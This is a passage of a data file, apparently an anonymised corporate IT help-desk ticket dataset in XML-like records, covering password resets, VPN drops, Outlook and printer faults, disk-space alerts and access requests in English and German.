    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_backup statistics:_x000d__x000a_          _x000d__x000a_  session queuing time (hours)         0.00        _x000d__x000a_  -------------------------------------------      _x000d__x000a_  completed disk agents ........          5          _x000d__x000a_  failed disk agents ...........          1          _x000d__x000a_  aborted disk agents ..........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  disk agents total  ...........          6          _x000d__x000a_  ===========================================      _x000d__x000a_  completed media agents .......          1          _x000d__x000a_  failed media agents ..........          0          _x000d__x000a_  aborted media agents .........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  media agents total  ..........          1          _x000d__x000a_  ===========================================      _x000d__x000a_  mbytes total .................   39418 mb        _x000d__x000a_  used media total .............          1          _x000d__x000a_  disk agent errors total ......          1    _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_job bkwin_HostName_770_inc failed in job_scheduler at: 10/12/2016 22:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="no power on the laptop"/>
    <s v="no power on the laptop"/>
    <s v="vgtpkjhn flwsytik"/>
    <x v="0"/>
  </r>
  <r>
    <s v="frequent account lockout on windows "/>
    <s v="frequent account lockout on windows "/>
    <s v="lwgytuxq qspdztiw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b is over 90% space consumed. space available: 3.0 g"/>
    <s v="HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b is over 90% space consumed. space available: 3.0 g"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="38"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0448847"/>
    <s v="ticket update on ticket_no0448847"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool not working "/>
    <s v="engineering_tool not working "/>
    <s v="gpdywmbt pmxfiqkl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need help resetting one of my team members hub/windows password."/>
    <s v="need help resetting one of my team members hub/windows password."/>
    <s v="mzyejqvd xzbtcfar"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset instruction "/>
    <s v="_x000a_summary:hello i need to reset one of my team members password. his name is mzyejqvd xzbtcfar, user id gilbrmuyt"/>
    <s v="jdlxkygf wlzqaivr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0448893"/>
    <s v="ticket update on ticket_no0448893"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please give schoegdythu read/write access to all files under  \\HostName_768\globalmfg\amerirtcas manufacturing\infrastructure\"/>
    <s v="please give schoegdythu read/write access to all files under  \\HostName_768\globalmfg\amerirtcas manufacturing\infrastructure\_x000a_mu # is "/>
    <s v="bwfhtumx japznrvb"/>
    <x v="33"/>
  </r>
  <r>
    <s v="please give gethyoff schoemerujt (schoegdythu) the same access to server HostName_776 as me (mccoyimgs)"/>
    <s v="please give gethyoff schoemerujt (schoegdythu) the same access to server HostName_776 as me (mccoyimgs)_x000a_my phone is "/>
    <s v="bwfhtumx japznrvb"/>
    <x v="11"/>
  </r>
  <r>
    <s v="skype does not work"/>
    <s v="skype will for load. phone . same problem as last week."/>
    <s v="otagsuzp xazhusry"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_868930"/>
    <s v="ticket update on inplant_868930"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open emails in outlook"/>
    <s v="unable to open emails in outlook"/>
    <s v="lrbjqcmh jbiwtzqr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to hr_tool denied"/>
    <s v="access to hr_tool denied"/>
    <s v="uyhceqzr tpbdwiyv"/>
    <x v="19"/>
  </r>
  <r>
    <s v="no access to engineering_tool : see attachment"/>
    <s v="no access to engineering_tool : see attachment"/>
    <s v="eagvusbr nguqityl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="vpn shut down"/>
    <s v="vpn shut down when i was clocking back in for lunch. phone said i had bee gone for 59 minutes. no warning."/>
    <s v="hdfcwmag plxstkad"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook doesn't start-up on my tablet dell latitude 7350"/>
    <s v="outlook doesn't start-up on my tablet dell latitude 7350"/>
    <s v="kzbrimwx dconpwbu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="it notices on the hub do not expire on the scheduled expiry date"/>
    <s v="it notices on the hub do not expire on the scheduled expiry date. _x000d__x000a_this notice should have expired on 10-10 but is still actively displayed today: _x000d__x000a_this notice should've expired on 10/7 - _x000d__x000a__x000d__x000a_please review other notices as well_x000d__x000a__x000d__x000a_"/>
    <s v="fdmaluyo tvecikxn"/>
    <x v="15"/>
  </r>
  <r>
    <s v="calls are coming to me but rerouting and showing a missed call"/>
    <s v="calls are coming to me but rerouting and showing a missed call_x000a__x000a_telephony_software ext : _x000a_"/>
    <s v="vaniegrz dbocqmpt"/>
    <x v="6"/>
  </r>
  <r>
    <s v="erp SID_37"/>
    <s v="i am able to access SID_34 and SID_39, however i can't access SID_37 for some reason.  i am getting an error that states: account access not within validity date. "/>
    <s v="qcfmxgid jvxanwre"/>
    <x v="19"/>
  </r>
  <r>
    <s v=" application erp - mii on node HostName_340 &amp; HostName_339 is down&quot; "/>
    <s v="application erp - mii on node HostName_340 &amp; HostName_339 is down&quot; "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="ms office : word issue "/>
    <s v="ms office : word issue "/>
    <s v="wbtrvdsi gdbuvszx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to SID_1"/>
    <s v="_x000d__x000a__x000d__x000a_received from: combxind.bvptuqxr@gmail.com_x000d__x000a__x000d__x000a_good afternoon_x000d__x000a_would you please check this error  in SID_1_x000d__x000a_user revelj_x000d__x000a_erp /SID_1_x000d__x000a_also, i need reset  my password in SID_1?_x000d__x000a_this is the error_x000d__x000a_[cid:image001.png@01d2247c.6249e400]_x000d__x000a_best "/>
    <s v="combxind bvptuqxr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to collaboration_platform"/>
    <s v="unable to login to collaboration_platform"/>
    <s v="zdgnlqkc zfjbpntg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access company, password expired"/>
    <s v="unable to access company, password expired"/>
    <s v="uzchtpxo ksvendorjir"/>
    <x v="0"/>
  </r>
  <r>
    <s v="danyhuie deyhtwet - a plant manager - keeps showing up on hr skype meetings."/>
    <s v="danyhuie deyhtwet - a plant manager - keeps showing up on hr skype meetings."/>
    <s v="uazkjifp dhtnevcq"/>
    <x v="26"/>
  </r>
  <r>
    <s v="wifi"/>
    <s v="_x000a__x000a_received from: nbdljruw.axcrspyh@gmail.com_x000a__x000a_hallo zusammen,_x000a__x000a_es werden bei mir keine wifi verbindungen mehr angezeigt._x000a_zuhause kann ich mich nicht mehr einwÃ¤hlen._x000a__x000a__x000a_bitte um hilfe._x000a__x000a_danke!_x000a__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="nbdljruw axcrspyh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="client's pc is rebooting randomly and also having office software issues"/>
    <s v="client's pc is rebooting randomly and also having office software issues"/>
    <s v="dslamtcb ezbmonjr"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to see my previous pay slips"/>
    <s v="unable to see my previous pay slips"/>
    <s v="fjciqgav ybkqvazh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wifi not working in pennsylvania (wireless issue at waynesboro)"/>
    <s v="wifi not working in pennsylvania_x000d__x000a__x000d__x000a_access point not working . work stoppage issue._x000d__x000a_tried calling christgry twice ..reached warehouse_tool mail. left brief message._x000d__x000a_dialed again. not able to reach christgry ."/>
    <s v="zcdirjeq azokfsdi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="vpn shut down"/>
    <s v="i was fixing an order. i went to answer a question on skype. i noticed that skype lost connection. then i noticed the vpn was shutting down. i didn't see a pop up note on vpn before the shut down."/>
    <s v="hdfcwmag plxstkad"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn connectivity issues"/>
    <s v="knocked off vpn connection again.  i wasn't doing anything in particular.  just finished a call.  "/>
    <s v="gakceqyb edrjthvo"/>
    <x v="19"/>
  </r>
  <r>
    <s v="ultramdntyet wrongful inwarehouse_tool, so# 24897522"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vflagort.xyotrhlf@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a_i just sent a request but found more data. so i received the attached email asking to look into the issue. when i look at the inwarehouse_tool (0159274337) referenced in the email, i saw the sample line was charged at cost when it shouldn't have been. when i go into the order, step on the sample line, go to document flow, i see a completely different inwarehouse_tool number than what is referenced. the inwarehouse_tool highlight below is for no cost, as it should be._x000d__x000a_[cid:image001.png@01d22471.b60d3930]_x000d__x000a__x000d__x000a_when i look at the document flow for the entire order, i see both inwarehouse_tools._x000d__x000a_[cid:image002.png@01d22472.10904e10]_x000d__x000a__x000d__x000a_please help me understand why the customer was inwarehouse_toold twice for the sample, and why the second inwarehouse_tool is at cost when it should not be. let me know what i need to do on my end to help with this, please._x000d__x000a__x000d__x000a_for record, the inwarehouse_tool sent on 9/19 is correct._x000d__x000a__x000d__x000a_best "/>
    <s v="lhyrskmn zbovukqm"/>
    <x v="12"/>
  </r>
  <r>
    <s v="wrongful inwarehouse_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vflagort.xyotrhlf@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a_our customer, ultramdntyet, was inwarehouse_toold for a sample line that was entered as a no charge sample in erp. i will be issuing a credit to the customer for the amount charged, but can you tell me why it was inwarehouse_toold to begin with?_x000d__x000a__x000d__x000a_[cid:image001.png@01d2246f.b6969f60]_x000d__x000a__x000d__x000a_best "/>
    <s v="lhyrskmn zbovukqm"/>
    <x v="12"/>
  </r>
  <r>
    <s v="vpn shut down"/>
    <s v="while searching for quotes in erp, vpn shut down. i didn't see a pop up note. the first clue with problem was that erp shut down, then i saw that vpn connection had shut down."/>
    <s v="hdfcwmag plxstkad"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to companysecure"/>
    <s v="unable to connect to companyssecure"/>
    <s v="kiqfusgp xfzsreug"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="unable to login to skype"/>
    <s v="mwahtgup wfgesvxd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip zip file"/>
    <s v="_x000a__x000a_received from: jwhmqnye.xlpvdwre@gmail.com_x000a__x000a_i have a large zip file that i want to download and add to a folder on HostName_771 (intellectual property).  when i unzip the file and try to save to HostName_771 it says that there is not enough space._x000a__x000a_lryturhyyth ryhunan_x000a_chief counsel for IP_x000a_jwhmqnye.xlpvdwre@gmail.com&lt;mailto:jwhmqnye.xlpvdwre@gmail.com&gt;_x000a_"/>
    <s v="jwhmqnye xlpvdwre"/>
    <x v="11"/>
  </r>
  <r>
    <s v="need to find old emails on outlook."/>
    <s v="need to find old emails on outlook."/>
    <s v="epqyourg rxjipfum"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0444091"/>
    <s v="ticket update on ticket_no0444091"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="nachdem ich outlook geÃ¶ffnet habe und eine e-mail angeklickt habe kommt ein blauer kreis der sich dreht und ich nichts "/>
    <s v="mehr machen. bitte dringend um hilfe. meine mobile tel. nr. "/>
    <s v="byltiakh vinqkxzm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="benefits app on ssp"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fpbmtxei.jtqbcnfs@gmail.com_x000d__x000a__x000d__x000a_i do not have the benefits solver application on my single sign on portal. can someone please assist me with getting this added? "/>
    <s v="fpbmtxei jtqbcnfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not working : crm issue "/>
    <s v="outlook not working, emails not opening : crm issue "/>
    <s v="vjwdyanl knfsjdgz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="locked out of his system"/>
    <s v="locked out of his system"/>
    <s v="jbyxkpof xetsjfgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset "/>
    <s v="erp SID_34 password reset "/>
    <s v="expmsvyc thsruydf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="tmunkaiv ockthiyj "/>
    <s v="_x000d__x000a__x000d__x000a_received from: nlgkmpaq.outrnkca@gmail.com_x000d__x000a__x000d__x000a_all,_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_i need to get a log in created for our new sr. production specialist tmunkaiv ockthiyj._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="nlgkmpaq outrnkca"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp password reset SID_34"/>
    <s v="erp password reset SID_34"/>
    <s v="efmzltnx uehqbaxo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dw06 print job error"/>
    <s v="dw06 print job error"/>
    <s v="vwpxjtof vmidzswj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="druker"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xahuklgm.dqvkfjlb@gmail.com_x000d__x000a__x000d__x000a_drucker  defekt_x000d__x000a__x000d__x000a__x000d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_x000a_[#+company/posts&gt;  [_x000d__x000a_select the following link to view the disclaimer in an alternate language. "/>
    <s v="xahuklgm dqvkfjlb"/>
    <x v="32"/>
  </r>
  <r>
    <s v="unable to login to impact award"/>
    <s v="unable to login to impact award_x000d__x000a_tried password reset but was not able to remember security question"/>
    <s v="cizplrvw ymxgteir"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need link to access outlook web mail"/>
    <s v="need link to access outlook web mail"/>
    <s v="khrflgcj zxojidhe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out "/>
    <s v="account locked out "/>
    <s v="oiudarbk ezhnjwdt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="performance problems in different applications / programdntyms"/>
    <s v="performance problems with erp, ieas and EU_tool._x000d__x000a_especially several timeout errors in EU_tool in the search functions. (see attachment) over the complete day."/>
    <s v="umykjweg jpwrfuhk"/>
    <x v="25"/>
  </r>
  <r>
    <s v="downloading or copying collaboration_platform files to purchasing"/>
    <s v="i want to upload directly to purchasing pdf files that are saved in a collaboration_platform file.  can this be done?  was told to open ticket and have assigned to collaboration development group. xszoedmc.gmhkdsnw@gmail.com  or skype."/>
    <s v="xszoedmc gmhkdsnw"/>
    <x v="15"/>
  </r>
  <r>
    <s v="cannot print to cl92"/>
    <s v="ever since a recent workstation move, i am unable to print to cl92.  before the move, i printed to cl92 regularly.  since the move, any attempt to print to cl92 prompts me to install the driver. which i do, but the print job fails regardless."/>
    <s v="irpvzhym kayqlbuh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="receiving product in logical warehouse (plant_100) batch is required"/>
    <s v="when using migo/goods receipt to receive product into plant_100 batch information is required  to process.  it has begun to happen more frequently over the past month.  the following rqfhiong zkwfqagbs are examples as to where this has occurred.  mm 4977683, 4978280, 4977686 and 2286073."/>
    <s v="qtrmxlgv dfruzvam"/>
    <x v="53"/>
  </r>
  <r>
    <s v="need to setup a aolhgbps pbxqtcek in SID_21 and SID_1 and in active directory"/>
    <s v="need to create the  aolhgbps pbxqtcek in active directory and assign groups miioperatordev and miioperatorqa. let barrtyh know when the aolhgbps pbxqtcek is ready."/>
    <s v="jypowefv yzgsldrx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="HostName_170: volume: /dev/SID_3ora on server: HostName_170 is over 98% space consumed. space available: 490 m"/>
    <s v="HostName_170: volume: /dev/SID_3ora on server: HostName_170 is over 98% space consumed. space available: 490 m"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="1"/>
  </r>
  <r>
    <s v="calendar is not visible by manager "/>
    <s v="calendar is not visible by manager "/>
    <s v="pnhlrfao ivjxlyfz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit EU_tool \fehler beim auftrag abmelden \ypladjeu wzfryxav"/>
    <s v="probleme mit EU_tool \fehler beim auftrag abmelden \ypladjeu wzfryxav"/>
    <s v="ypladjeu wzfryxav"/>
    <x v="24"/>
  </r>
  <r>
    <s v="basis on-call / shift details..."/>
    <s v="_x000d__x000a__x000d__x000a_received from: mnxbeuso.rfmdlwuo@gmail.com_x000d__x000a__x000d__x000a_dac / gso â€“_x000d__x000a__x000d__x000a_basis on-call details has been modified and the modified is placed in the below location in the collaboration_platform. please update your records accordingly._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="mnxbeuso rfmdlwuo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="is the finance_app system still down we need this system to retrieve financial information for our quarterly closing"/>
    <s v="is the finance_app system still down_x000d__x000a_we need this system to retrieve financial information for our quarterly closing"/>
    <s v="vsbtygin oufhtbas"/>
    <x v="54"/>
  </r>
  <r>
    <s v="laptop byclpwmv esafrtbh defekt"/>
    <s v="laptop byclpwmv esafrtbh defekt"/>
    <s v="sxabotdw xlozwcyk"/>
    <x v="32"/>
  </r>
  <r>
    <s v="ess password reset"/>
    <s v="ess password reset"/>
    <s v="lndypaqg dhqwtcsr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mr. guruythupyhtyad is still not able to open the folder ie., m:\mtb project mgmt\servicing"/>
    <s v="from: jayatramdntydba cvyg _x000a_sent: wednesday, october 12, 2016 2:09 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: bhayhtrathramdnty mamilujli; amihtar lalthy_x000a_subject: fw: ticket_no1557371:new non-employee :gurublxkizmh nvodbrfluppasadabasavaraj:vvkuthyrppg_x000a__x000a_hello,_x000a__x000a_mr. guruythupyhtyad is still not able to open the folder ie., m:\mtb project mgmt\servicing.  please look into this subject and provide access._x000a__x000a_best "/>
    <s v="uaeqlxro rzsdalyc"/>
    <x v="11"/>
  </r>
  <r>
    <s v="deployment notification - ms .net framdntyework 4.6.1 &amp; business_client 5.0 SID_792 - emea -  issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qaohugxw.kdeqjncw@gmail.com_x000d__x000a__x000d__x000a_i got an error message after 2 minutes_x000d__x000a_i think that update has not been done correctly ._x000d__x000a_could you please check my computer._x000d__x000a__x000d__x000a_best "/>
    <s v="qaohugxw kdeqjncw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="druckerprobleme mit em021 in germany"/>
    <s v="_x000d__x000a__x000d__x000a_received from: mobaidfx.gviwlsrm@gmail.com_x000d__x000a__x000d__x000a_hallo zusammen,_x000d__x000a__x000d__x000a_der drucker em021 druckt nicht mehr Ã¼ber die eingabe â€žbriefkopf&quot;._x000d__x000a_bitte einstellungen korrigieren._x000d__x000a__x000d__x000a_danke vorab._x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="mobaidfx gviwlsrm"/>
    <x v="41"/>
  </r>
  <r>
    <s v="need help"/>
    <s v="_x000d__x000a__x000d__x000a_received from: axcbfuqo.yiagubvh@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a_i am in trouble with my password._x000d__x000a_i changed the password and i have the possibility to be connected to my e-mail and connection to various areas._x000d__x000a_but i still have my old password to start my computer._x000d__x000a_if i request to change my password using ctrl alt delete and change the password, it is not working._x000d__x000a_can you help, "/>
    <s v="axcbfuqo yiagubvh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="software &quot;babiluntr&quot; does not work"/>
    <s v="software &quot;babiluntr&quot; does not work"/>
    <s v="mopuczxh mflsykip"/>
    <x v="41"/>
  </r>
  <r>
    <s v="display link not working"/>
    <s v="_x000a__x000a_received from: pxbqkfgm.qexvrmcn@gmail.com_x000a__x000a_hello,_x000a__x000a_my laptop's display link is not working. pls. help._x000a_message comes as &quot;could not recognize usb device.&quot;_x000a__x000a_vivthyek byuihand_x000a_asst manager- sales_x000a_company india ltd, india._x000a__x000a__x000a_[cid:image009.jpg@01SID_35d8e.07ce5550]_x000a__x000a__x000a__x000a_"/>
    <s v="pxbqkfgm qexvrmcn"/>
    <x v="18"/>
  </r>
  <r>
    <s v="need display link adaptor and simcard holder"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zdgxtfqs.tibmhxcs@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_please note that my display link adaptor is not working, kindly arrange a replacement._x000d__x000a__x000d__x000a_also i need new data card sim-card holder for my laptop._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="zdgxtfqs tibmhxcs"/>
    <x v="18"/>
  </r>
  <r>
    <s v="copy of desktop files"/>
    <s v="_x000a__x000a_received from: hjcpyxtq.okycpbsz@gmail.com_x000a__x000a_kindly copy the desktop files of prithivrtyaj (user id:  vvyhtyumasp) to guruythupyhtyad (vvkuthyrppg) local folder._x000a__x000a_pc no : awyw8911888_x000a__x000a__x000a_"/>
    <s v="hjcpyxtq okycpbsz"/>
    <x v="18"/>
  </r>
  <r>
    <s v="telephony_software via remote number"/>
    <s v="_x000a__x000a_received from: gmwdvrou.aupnvems@gmail.com_x000a__x000a_hello team,_x000a__x000a_iÂ´ve got a problem â€“ i canÂ´t call while working remote _x000a_can you help?_x000a_"/>
    <s v="gmwdvrou aupnvems"/>
    <x v="6"/>
  </r>
  <r>
    <s v="outlook repeatedly asking for passwords"/>
    <s v="outlook repeatedly asking for passwords"/>
    <s v="bhkgxaty ovmkntah"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit EU_tool \tmqfjard qzhgdoua"/>
    <s v="probleme mit EU_tool \tmqfjard qzhgdoua"/>
    <s v="tmqfjard qzhgdoua"/>
    <x v="24"/>
  </r>
  <r>
    <s v="bitte einen ordner im teams laufwerk fÃ¼rth anlegen"/>
    <s v="_x000a__x000a_received from: osjqfbvw.hlmgrfpx@gmail.com_x000a__x000a_wÃ¼rden sie bitte einen ordner im teams laufwerk fÃ¼rth anlegen._x000a__x000a_name:                  hr-tr_x000a__x000a_voller zugriff:     rtnzvplq erhmuncq_x000a_                              rtgdcoun pngufmvq_x000a_                              naruedlk mpvhakdq_x000a_                              efodqiuh tpfnzkli_x000a_                              rcwpvkyb exgjscql_x000a_                              gabryltke schÃ¼tt_x000a__x000a__x000a_vielen dank._x000a__x000a_gabryltke schÃ¼tt_x000a_human resources_x000a_osjqfbvw.hlmgrfpx@gmail.com&lt;mailto:osjqfbvw.hlmgrfpx@gmail.com&gt;_x000a__x000a__x000a_company shared services gmbh_x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq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osjqfbvw hlmgrfpx"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job dir failed in job_scheduler at: 10/12/2016 06:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job dir failed in job_scheduler at: 10/12/2016 06:04:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="request lauacyltoe hxgaycze version outlook update."/>
    <s v="_x000d__x000a__x000d__x000a_received from: luxdnsvk.qmnyzcfs@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a__x000d__x000a_my laptop currently has 2010 version of microsoft outlook._x000d__x000a_kindly help me in getting the lauacyltoe hxgaycze version of the same._x000d__x000a__x000d__x000a_with best "/>
    <s v="luxdnsvk qmnyzcfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="latitude tab 7350 not detecting the telecom_vendor_3 broadband sim"/>
    <s v="latitude tab 7350 not detecting the telecom_vendor_3 broadband sim_x000a__x000a_phone: "/>
    <s v="neoarmgd meodvbxu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="owner of the group &quot;k-bhty-plc4-yhhm-er&quot; is not available and has gave approval "/>
    <s v="owner of the group &quot;k-bhty-plc4-yhhm-er&quot; is not available and has gave approval to add ploxzuts utvimnwo &lt;ploxzuts.utvimnwo@gmail.com&gt;  attaching the approval mail_x000a__x000a_from: thvnfs anyhusppa _x000a_sent: wednesday, october 12, 2016 3:19 pm_x000a_to: gzjtweph mnslwfqv_x000a_subject: fw: inc1558231 : add my name to distribution lists_x000a__x000a_fyiâ€¦_x000a__x000a_with best "/>
    <s v="tcbonyes gpfacron"/>
    <x v="0"/>
  </r>
  <r>
    <s v="gso hotline not working"/>
    <s v="gso hotline not working. new as well old numbers tried, user are getting welcome message after that it is blank nothing can be heard."/>
    <s v="ughzilfm cfibdamq"/>
    <x v="36"/>
  </r>
  <r>
    <s v="reset the password for wcrbmgon kcudbnrw on e-mail"/>
    <s v="reset the password for wcrbmgon kcudbnrw on e-mail"/>
    <s v="wcrbmgon kcudbnrw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="maschinen pc r239 ohne funktion -&gt; bitte prÃ¼fen"/>
    <s v="maschinen pc r239 ohne funktion -&gt; bitte prÃ¼fen"/>
    <s v="ljxzyriq zqxkrcev"/>
    <x v="32"/>
  </r>
  <r>
    <s v="faxen von purchase orders direkt aus der po schlÃ¤gt seit gestern fÃ¼r alle fehl."/>
    <s v="faxen von purchase orders direkt aus der po schlÃ¤gt seit gestern fÃ¼r alle fehl._x000d__x000a_faxing from the purchase orders directly from the po has been unsuccessful since yesterday."/>
    <s v="rnajgdmb fioznltc"/>
    <x v="29"/>
  </r>
  <r>
    <s v="rechner fÃ¼r erodiermaschine defekt \youfzmgp xvysrnmb"/>
    <s v="rechner fÃ¼r erodiermaschine defekt \youfzmgp xvysrnmb"/>
    <s v="youfzmgp xvysrnmb"/>
    <x v="24"/>
  </r>
  <r>
    <s v="reset the password for xbsckemt durnfyxb on sonstiges"/>
    <s v="hallo,_x000d__x000a_bitte nur das passwort fÃ¼r &quot;appricatehub.com&quot; (impact award) zurÃ¼cksetzen, da auch die sicherheitsfrage: &quot;wie hieÃŸ die erste schule, die sie besucht haben?&quot; nicht korrekt beantwortet werden kann._x000d__x000a_danke."/>
    <s v="xbsckemt durnfyxb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="new customer:81055992 has some problme"/>
    <s v="i have created new customer account 81055992 in 1333, but it has a problem, it showns &quot;customer 81055992 is markhtyed for deletion in the sales area selected&quot;. please help handle it, "/>
    <s v="pvfclkmn gebyipwr"/>
    <x v="14"/>
  </r>
  <r>
    <s v="in outlook ,i am not getting pauhtul.phillyhuip@company.com mails"/>
    <s v="in outlook ,i am not getting pauhtul.phillyhuip@company.com mails_x000a______________________x000a_ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_govind_x000a_ hello _x000a_ic_x000a_ website visitor has joined the conversation_x000a_dwfiykeo argtxmvcumar3_x000a_ hello_x000a_ Â Â Â ,Â Â Â please click on the link, run it twice. give me the id &amp; password._x000a_govind23_x000a_ few days back i created folder for pollaurid messages_x000a_dwfiykeo argtxmvcumar3_x000a_ ok_x000a_ please provide me access to your system_x000a_govind23_x000a_ its not working to me. can you send me teamviewer_x000a_dwfiykeo argtxmvcumar3_x000a_ _x000a_ please try this link_x000a_govind23_x000a_ 376 775 252 (tinyurl)_x000a_ 8054(tinyurl)_x000a_"/>
    <s v="jacgtfxo vlbeuxif"/>
    <x v="0"/>
  </r>
  <r>
    <s v="archiving_tool viewer"/>
    <s v="archiving_tool 10.0 has been installed on my pc but i can't view attachments in erp._x000d__x000a_could you please help me ?_x000d__x000a__x000d__x000a_"/>
    <s v="dnqavlem ndymoifb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to submit lean tracker"/>
    <s v="unable to submit lean tracker"/>
    <s v="qnazgxml lbmukxey"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_459 failed in job_scheduler at: 10/12/2016 04:44:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_459 failed in job_scheduler at: 10/12/2016 04:44:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="maus defekt \niptbwdq csenjruz"/>
    <s v="maus defekt \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit ws cad \wsboedtj yvlswgxb"/>
    <s v="probleme mit ws cad \wsboedtj yvlswgxb"/>
    <s v="wsboedtj yvlswgxb"/>
    <x v="24"/>
  </r>
  <r>
    <s v="engineering tool - urgent customer drawing change - replace of file not possible !!!!"/>
    <s v="1.)     briefly describe what you were trying to do and the issue you have encountered._x000d__x000a_it is not possible to &quot;replace the original file&quot; as the following error messages occurs._x000d__x000a_please refer to the attached picture:_x000d__x000a_2.) please include a screenshot of any error messages_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="gdxujefz egnwtvch"/>
    <x v="10"/>
  </r>
  <r>
    <s v="outlook on laptop won't startup anymore. errormessage"/>
    <s v="name:tuzkadxv rxloutpn_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:tuzkadxv.rxloutpn@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:outlook on laptop won't startup anymore. errormessage_x000a__x000a_&quot;a new guard page for the stack cannot be created"/>
    <s v="tuzkadxv rxloutpn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to create sto_mm 7340903 and mm 6239893"/>
    <s v="we're unable to create sto for mm# 7340903 per pr# 4121896402/00001 and mm# 7340904 per purrqs 4121803106/00001 , found the error message as per attached    please help fixing this error and advise back to us aerp. "/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="29"/>
  </r>
  <r>
    <s v="probleme mit skype"/>
